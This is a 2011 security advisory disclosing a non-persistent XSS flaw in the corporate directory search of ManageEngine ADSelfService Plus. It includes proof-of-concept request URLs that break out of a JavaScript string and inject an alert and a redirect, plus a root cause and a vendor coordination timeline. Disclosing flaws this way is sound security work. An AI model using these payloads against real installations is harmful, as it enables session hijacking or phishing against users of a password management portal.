Vulnerability ID: VRPTH-2011-001
Reference: http://jameswebb.me/vulns/vrpth-2011-001.txt

Vulnerability Summary

Non-persistent XSS in Zoho ManageEngine ADSelfService Plus

Test Environment

Windows 2008RC2 fully patched.
ManageEngine ADSelfServicePlus version 4.5 Build 4521 installed.
Integrated Into TestDomain

Technical Details

Corporate Directory Search feature in ManageEngine ADSelfServicePlus
version 4.5 Build 4521 is susceptible to
non-persistent XSS attacks. These vulnerabilities are manifest by the
ability for attacker to terminate
javascript variable declarations, escape encapsulation, and append
arbitrary javascript code.
ADSelfService Plus is a password management application for Active
Directory environments.

Proof of Concept

Double-Quote String Termination
HTTP Request =
https://serverip:port/EmployeeSearch.cc?searchType=contains&searchBy=ALL_FIELDS&searchString=";alert("XSS");//\"

Response Source View
<script language="javascript">
var searchValue = "';alert(XSS)//\"";

Single-Quote String Termination
Similarly…
HTTP Request=
https://serverip:port/EmployeeSearch.cc?searchType=';document.location="http://www.cnn.com";//\"&searchBy=ALL_FIELDS&searchString=Bob

Root Cause Analysis

Input is not being escaped/filtered prior to javascript variable assignment

Fix/Work Around

Not aware of patch/fix. Contact Vendor.

Coordination History

09/28/11 - Contacted AdSelfServicePro Team with Vuln. Details
10/07/11 - Requested Update
10/08/11 - Received Response: Advised issues will be handled in future release.
10/27/11 - Requested Update:  Inquired if newer posted builds fixed issue
11/03/11 - Received Response: Newer build did not address; Indicated
still researching…
11/17/11 - Released Advisory